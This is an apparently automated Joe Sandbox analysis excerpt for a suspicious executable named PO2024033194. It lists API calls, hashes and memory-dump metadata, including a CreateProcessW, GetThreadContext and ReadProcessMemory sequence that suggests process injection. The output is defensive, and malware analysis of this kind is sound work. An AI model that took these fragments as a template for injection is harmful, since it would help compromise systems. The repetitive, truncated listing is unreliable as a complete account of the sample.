                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                  • String ID:
                                                                  • API String ID: 3170942423-0
                                                                  • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                  • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                  • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                  • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #v
                                                                  • API String ID: 0-554117064
                                                                  • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                  • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                  • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                  • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                  • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentTerminate
                                                                  • String ID: #v
                                                                  • API String ID: 2429186680-554117064
                                                                  • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                  • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                  • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                  • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 04164B2B
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04164BC1
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04164BE3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2170735362.0000000004163000.00000040.00000020.00020000.00000000.sdmp, Offset: 04163000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_4163000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                  • Instruction ID: 0acfc4c6b37cce24ed935d448a4a7edceb59c836668251dd4137f1ca3f9da0d0
                                                                  • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                  • Instruction Fuzzy Hash: 7862FF30A14258DBEB24CFA4C850BDEB376EF58300F1091A9D50DEB394E779AE91CB59
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: Error:
                                                                  • API String ID: 4104443479-232661952
                                                                  • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                  • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                  • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                  • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                  APIs
                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                    • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                    • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                    • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                    • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                  • String ID: X$pWH
                                                                  • API String ID: 85490731-941433119
                                                                  • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                  • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                  • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                  • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • _memmove.LIBCMT ref: 00401B57
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                  • String ID: @EXITCODE
                                                                  • API String ID: 2734553683-3436989551
                                                                  • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                  • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                  • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                  • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                  • String ID:
                                                                  • API String ID: 1794320848-0
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 0043214B
                                                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                  • _malloc.LIBCMT ref: 0043215D
                                                                  • _malloc.LIBCMT ref: 0043216F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _malloc$AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 680241177-0
                                                                  APIs
                                                                    • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                  • _free.LIBCMT ref: 004295A0
                                                                    • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                    • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                    • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                    • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                    • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                    • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                                  • API String ID: 3938964917-2806939583
                                                                  Strings
                                                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _strcat
                                                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                  • API String ID: 1765576173-2684727018
                                                                  APIs
                                                                  • __wsplitpath.LIBCMT ref: 004678F7
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast__wsplitpath_malloc
                                                                  • String ID:
                                                                  • API String ID: 4163294574-0
                                                                  APIs
                                                                    • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                    • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                    • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                  • _strcat.LIBCMT ref: 0040F786
                                                                    • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                    • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                  • String ID:
                                                                  • API String ID: 3199840319-0
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  APIs
                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                  • __lock_file.LIBCMT ref: 00414A8D
                                                                    • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                  • __fclose_nolock.LIBCMT ref: 00414A98
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2800547568-0
                                                                  APIs
                                                                  • __lock_file.LIBCMT ref: 00415012
                                                                  • __ftell_nolock.LIBCMT ref: 0041501F
                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2999321469-0
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 04164B2B
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04164BC1
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04164BE3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2170735362.0000000004163000.00000040.00000020.00020000.00000000.sdmp, Offset: 04163000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_4163000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _memmove.LIBCMT ref: 00444B34
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: _malloc_memmove
• String ID:
• API String ID: 1183979061-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: __lock_file
• String ID:
• API String ID: 3031932315-0
APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
APIs
• CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 04165381
Memory Dump Source
• Source File: 00000000.00000002.2170735362.0000000004163000.00000040.00000020.00020000.00000000.sdmp, Offset: 04163000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4163000_PO2024033194.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 04165381
Memory Dump Source
• Source File: 00000000.00000002.2170735362.0000000004163000.00000040.00000020.00020000.00000000.sdmp, Offset: 04163000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4163000_PO2024033194.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
• DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
• GetKeyState.USER32(00000011), ref: 0047C92D
• GetKeyState.USER32(00000009), ref: 0047C936
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
• GetKeyState.USER32(00000010), ref: 0047C953
• GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
• SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
• SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
• _wcsncpy.LIBCMT ref: 0047CA29
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
• SendMessageW.USER32 ref: 0047CA7F
• InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
• SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
• ImageList_SetDragCursorImage.COMCTL32(0093DD48,00000000,00000000,00000000), ref: 0047CB9B
• ImageList_BeginDrag.COMCTL32(0093DD48,00000000,000000F8,000000F0), ref: 0047CBAC
• SetCapture.USER32(?), ref: 0047CBB6
• ClientToScreen.USER32(?,?), ref: 0047CC17
• ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
• ReleaseCapture.USER32 ref: 0047CC3A
• GetCursorPos.USER32(?), ref: 0047CC72
• ScreenToClient.USER32(?,?), ref: 0047CC80
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
• SendMessageW.USER32 ref: 0047CD12
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
• SendMessageW.USER32 ref: 0047CD80
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
• GetCursorPos.USER32(?), ref: 0047CDC8
• ScreenToClient.USER32(?,?), ref: 0047CDD6
• GetParent.USER32(00000000), ref: 0047CDF7
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
• SendMessageW.USER32 ref: 0047CE93
• ClientToScreen.USER32(?,?), ref: 0047CEEE
• TrackPopupMenuEx.USER32(?,00000000,?,?,00901B60,00000000,?,?,?,?), ref: 0047CF1C
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
• SendMessageW.USER32 ref: 0047CF6B
• ClientToScreen.USER32(?,?), ref: 0047CFB5
• TrackPopupMenuEx.USER32(?,00000080,?,?,00901B60,00000000,?,?,?,?), ref: 0047CFE6
• GetWindowLongW.USER32(?,000000F0), ref: 0047D086
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                  • String ID: @GUI_DRAGID$F
                                                                  • API String ID: 3100379633-4164748364
                                                                  • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                  • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                  • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                  • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                  APIs
                                                                  • GetForegroundWindow.USER32 ref: 00434420
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                  • IsIconic.USER32(?), ref: 0043444F
                                                                  • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                  • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
